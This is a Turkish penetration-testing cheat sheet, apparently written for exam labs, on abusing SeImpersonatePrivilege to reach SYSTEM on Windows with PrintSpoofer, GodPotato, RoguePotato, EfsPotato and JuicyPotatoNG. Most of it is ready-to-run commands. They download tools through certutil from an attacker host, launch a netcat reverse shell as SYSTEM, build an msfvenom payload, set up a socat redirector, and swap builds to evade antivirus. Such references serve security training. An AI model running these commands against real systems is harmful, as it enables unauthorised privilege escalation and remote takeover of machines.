PrivEsc ✓ EXAM-SAFE orta :135

SeImpersonate / SeAssignPrimaryToken Abuse — Potato Ailesi (PrintSpoofer, RoguePotato, JuicyPotatoNG, GodPotato, EfsPotato)

SeImpersonatePrivilege veya SeAssignPrimaryTokenPrivilege tasiyan servis hesaplarini (IIS, MSSQL, sched task) NT AUTHORITY\SYSTEM'e yukselten tum Potato ailesinin secim rehberi: hangi Windows surumunde hangi araci kullanacaginiz ve calisma mantigi.

ÖN KOŞULLAR

whoami /priv ciktisinda SeImpersonatePrivilege veya SeAssignPrimaryTokenPrivilege = Enabled
Hedefe binary tasiyabilecek bir shell (servis hesabi: iis apppool, mssql, network service, local service)

┌──

Komutlar

cmd ✓ EXAM-SAFE user

whoami /priv | findstr /i "impersonate primarytoken"

SeImpersonate veya SeAssignPrimaryToken'in Enabled olup olmadigini dogrular — Potato ailesinin on sarti. HackTricks — Abusing Tokens (SeImpersonate)

certutil ✓ EXAM-SAFE user

certutil.exe -urlcache -split -f http://{{LHOST}}:{{LPORT}}/PrintSpoofer64.exe C:\Windows\Temp\ps.exe

PrintSpoofer binary'sini hedefe indirir. LOLBAS: Certutil.exe

printspoofer ✓ EXAM-SAFE user

C:\Windows\Temp\ps.exe -i -c cmd

PrintSpoofer: spooler named-pipe impersonation ile interaktif SYSTEM cmd acar. Win10/Server2016-2019'da en guvenilir yontem. HackTricks — SeImpersonate (PrintSpoofer)

printspoofer ✓ EXAM-SAFE user

C:\Windows\Temp\ps.exe -c "C:\Windows\Temp\rev.exe"

PrintSpoofer ile SYSTEM olarak bir reverse shell binary'sini calistirir (interaktif olmayan shell'lerde tercih edilir). HackTricks — SeImpersonate (PrintSpoofer)

godpotato ✓ EXAM-SAFE user

C:\Windows\Temp\GodPotato-NET4.exe -cmd "cmd /c whoami"

GodPotato: DCOM/RPC ile token impersonation; Windows Server 2012-2022 ve Win8-11 araliginda genis uyumluluk. .NET surumunu hedefe gore secin (NET2/NET35/NET4). HackTricks — SeImpersonate (GodPotato)

godpotato ✓ EXAM-SAFE user

C:\Windows\Temp\GodPotato-NET4.exe -cmd "C:\Windows\Temp\nc.exe {{LHOST}} {{LPORT}} -e cmd"

GodPotato ile SYSTEM seviyesinde reverse shell tetikler. HackTricks — SeImpersonate (GodPotato)

roguepotato ✓ EXAM-SAFE user

C:\Windows\Temp\RoguePotato.exe -r {{LHOST}} -e "C:\Windows\Temp\rev.exe" -l 9999

RoguePotato: harici OXID resolver gerektirir. {{LHOST}} uzerinde 'socat tcp-listen:135,fork,reuseaddr tcp:HEDEF:9999' calistirin. Port 135 disari kapaliysa JuicyPotato yerine bu kullanilir. HackTricks — SeImpersonate (RoguePotato)

socat ✓ EXAM-SAFE

socat tcp-listen:135,reuseaddr,fork tcp:{{RHOST}}:9999

Kali tarafinda RoguePotato icin OXID resolver redirector. Hedefin 135'ini kendi 9999'una geri yonlendirir. HackTricks — SeImpersonate (RoguePotato)

efspotato ✓ EXAM-SAFE user

C:\Windows\Temp\EfsPotato.exe "whoami"

EfsPotato: MS-EFSR (EFS RPC) uzerinden impersonation. PrintSpoofer'in spooler kapali oldugu ortamlarda alternatif. HackTricks — SeImpersonate (EfsPotato)

juicypotatong ✓ EXAM-SAFE user

C:\Windows\Temp\JuicyPotatoNG.exe -t * -p "C:\Windows\Temp\rev.exe"

JuicyPotatoNG: guncellenmis CLSID/port secimi ile yeni surumlerde de calisabilen JuicyPotato turevi. Klasik JuicyPotato Win10 1809/Server2019 sonrasi calismaz. HackTricks — SeImpersonate (JuicyPotatoNG)

Mantik

Servis hesaplari (iis apppool…, NT Service\MSSQLSERVER, NETWORK SERVICE, LOCAL SERVICE) genellikle SeImpersonatePrivilege tasir. Bu ayricalik, bir SYSTEM token’ini ele gecirip impersonate ederek o token ile yeni process baslatmaya izin verir. Potato ailesi, SYSTEM’in baglandigi bir RPC/DCOM/named-pipe kanalini kandirip kimlik dogrulamayi ele gecirmenin farkli yontemleridir.

On Kontrol

whoami /priv ciktisinda SeImpersonatePrivilege = Enabled (veya SeAssignPrimaryTokenPrivilege) gormeniz sart. Yoksa bu aile calismaz; SeAssignPrimaryToken icin win-assignprimarytoken sayfasina bakin.

Hangi Araci Ne Zaman (surum bazli secim)

PrintSpoofer — ilk tercih. Print Spooler servisi calisiyorsa Win10 / Server 2016-2019’da en stabil; harici port/redirector gerektirmez. -i -c cmd interaktif SYSTEM verir.
GodPotato — en genis uyumluluk. Server 2012 R2 → 2022, Windows 8 → 11. Hedefin .NET surumune gore (NET2 / NET35 / NET4) binary secin. Spooler kapali olsa da calisir. Modern lab’larda varsayilan tercih.
EfsPotato — Spooler kapali ve GodPotato bloklandiginda; MS-EFSR RPC’yi kullanir.
RoguePotato — JuicyPotato modern Windows’ta (1809/Server2019+) calismayinca devreye girer. Harici OXID resolver ister: Kali’de socat tcp-listen:135,fork,reuseaddr tcp:{{RHOST}}:9999 calistirin ve -r {{LHOST}} verin. Hedeften 135 cikisi gerekir.
JuicyPotatoNG — klasik JuicyPotato’nun yeni CLSID/port mantikli surumu; bazi guncel build’lerde tekrar calisir. Klasik JuicyPotato’yu yalnizca eski sistemlerde (Win7/8, Server 2008-2016) deneyin.

Karar Ozeti

Modern lab → GodPotato dene. Spooler acik ve eski-orta surum → PrintSpoofer. 135 disari acik, digerleri patli → RoguePotato. Spooler kapali + GodPotato bloklu → EfsPotato. Cok eski sistem → JuicyPotato / JuicyPotatoNG.

Reverse Shell ile Kullanim

Interaktif olmayan shell’lerde (-i calismaz) once Kali’de msfvenom -p windows/x64/shell_reverse_tcp LHOST={{LHOST}} LPORT={{LPORT}} -f exe -o rev.exe ile payload uretin, hedefe tasiyin, ardindan Potato’nun -c/-cmd/-e parametresi ile SYSTEM olarak calistirin. Kali’de nc -lvnp {{LPORT}} dinleyin.

Notlar

Tum binary’leri C:\Windows\Temp veya yazma yetkiniz olan bir dizine koyun (iis apppool genelde inetpub’a yazabilir).
AV yakalarsa GodPotato/PrintSpoofer’in farkli derlemelerini veya .NET surum varyantlarini deneyin.
Basari teyidi: SYSTEM shell’de whoami → nt authority\system.

┌──

Kaynaklar

↗ HackTricks — Abusing Tokens / SeImpersonate & SeAssignPrimaryToken ↗ itm4n — PrintSpoofer ↗ BeichenDream — GodPotato ↗ antonioCoco — RoguePotato ↗ antonioCoco — JuicyPotatoNG